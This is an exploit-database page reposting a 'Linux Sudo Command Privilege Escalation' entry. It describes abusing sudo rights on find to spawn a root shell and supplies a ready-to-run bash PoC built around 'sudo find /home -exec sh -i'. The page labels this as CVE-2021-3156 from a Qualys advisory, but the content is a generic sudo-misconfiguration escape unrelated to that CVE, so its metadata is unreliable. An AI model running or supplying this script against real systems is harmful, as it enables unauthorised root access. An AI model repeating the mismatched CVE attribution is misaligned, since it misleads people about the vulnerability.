Advertisement






Linux Sudo Command Privilege Escalation

CVE Category Price Severity
CVE-2021-3156 CWE-269 $10,000 - $50,000 High
Author Risk Exploitation Type Date
Qualys Security Advisory High Local 2023-12-24
CPE
cpe:cpe:/o:linux:linux_kernel
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120045

Below is a copy:

Linux Sudo Command Privilege Escalation
LINUX PRIVILEGE ESCALATION SUDO COMMAND
==============================

What is exploit?
-----------------

If the attacker cant directly get root access via any other techniques, he might try to compromise any of the users who have SUDO access. Once he has access to any of the SUDO users, he can basically execute any commands with root privileges.

Administrators might just allow the users to run a few commands through SUDO and not all of them but even with this configuration, they might introduce vulnerabilities unknowingly which can lead to privilege escalation.

A classic example of this is assigning SUDO rights to the find command so that another user can search for particular files/logs in the system. While the admin might be unaware that the find command contains parameters for command execution, an attacker can execute commands with root privilege.

Exploiting misconfigured SUDO rights to get root access

$ sudo -l  Prints the commands which we are allowed to run as SUDO

We can run find, cat and python as SUDO. These all commands will run as root when run with SUDO. If we can somehow escape to the shell through any of these commands, we can get root access.

$ sudo find /home -exec sh -i \;  find commands exec parameter can be used for arbitrary code execution.

POC CODE
------------

#!/bin/bash

if command -v sudo &> /dev/null; then
  echo 
  echo "SUDO PRIVILEGE ESCALATION"
  echo
  echo "Coded By Anezatra"
  echo
  echo "[*] Process ready"
  echo "[*] Executing command ..."
  echo "[+] Shell is opened!"
  echo
else
  echo
  echo "[-] Error: 'sudo' command not found. Not vulnerable."
  exit 1
fi

sudo find /home -exec sh -i \; -exec {} \;

if [ $? -ne 0 ]; then
  echo
  echo "[-] Error: The find command encountered an issue."
fi

USAGE
--------
bash poc.sh

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.